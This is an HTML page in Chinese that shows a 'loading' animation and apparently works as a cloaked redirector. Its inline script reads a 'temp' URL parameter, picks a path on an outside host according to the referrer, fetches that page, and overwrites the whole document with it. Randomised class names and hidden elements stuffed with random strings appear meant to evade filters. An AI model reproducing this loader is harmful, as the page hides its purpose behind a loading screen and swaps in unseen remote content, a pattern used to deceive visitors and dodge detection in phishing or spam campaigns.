<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ccRrCjCxalb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ccRrCjCxalb .LpJ91l8rR {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ccRrCjCxalb .content {
            line-height: 50px;
            text-align: center
        }

        .ccRrCjCxalb .img {
            width: 100%
        }

        .ccRrCjCxalb .s7tAgsno {
            text-align: center
        }

        .ccRrCjCxalb .s7tAgsno span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ccRrCjCxalb .s7tAgsno span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ccRrCjCxalb .s7tAgsno span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ccRrCjCxalb .s7tAgsno span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ccRrCjCxalb .s7tAgsno span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ccRrCjCxalb .s7tAgsno span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ccRrCjCxalb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function sNuovvPuHJRgc(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var lTM41 = sNuovvPuHJRgc('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ lTM41 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ lTM41 +".html?a=share";
		}
		
        EurkOJAcCt=url+"#"+new Date().getTime();
        EurkOJAcCt && function() {
            $.get(EurkOJAcCt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>VKQzlI4QTOE0W2BWei22gd68JNVnAiLFwxNqr</p>
<ul style='display:none' >qnTpIEfDDIOKeWMwyDFF3TG3Fvepqdf8</ul>
<b style='display:none' >iHyCPdH1C5L38GRVEEjhkEAAcsFKZfS5k</b>
<a  href='#' style='display:none'>VpAfMnaFiuB2yGDwDUqQ2aP1EFiDuWGbrwQccI3dx3FUXcdxc67lANfAaWtBUJheea</a>
<div style='display:none'>C1j2N7C9y1KpD0tFeS0AWW8kkJcede8JepV6JjL3j</div><div class="ccRrCjCxalb">
    <div class="LpJ91l8rR">
        <div class="s7tAgsno">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<ul style='display:none' >oOH9zPoRLuKLzgWodPDlll75cVYa5K102B6vhSFsWSMtXYTbi5G8iQ4gkI3</ul>
<ul style='display:none' >oOH9zPoRLuKLzgWodPDlll75cVYa5K102B6vhSFsWSMtXYTbi5G8iQ4gkI3</ul></body>
</html>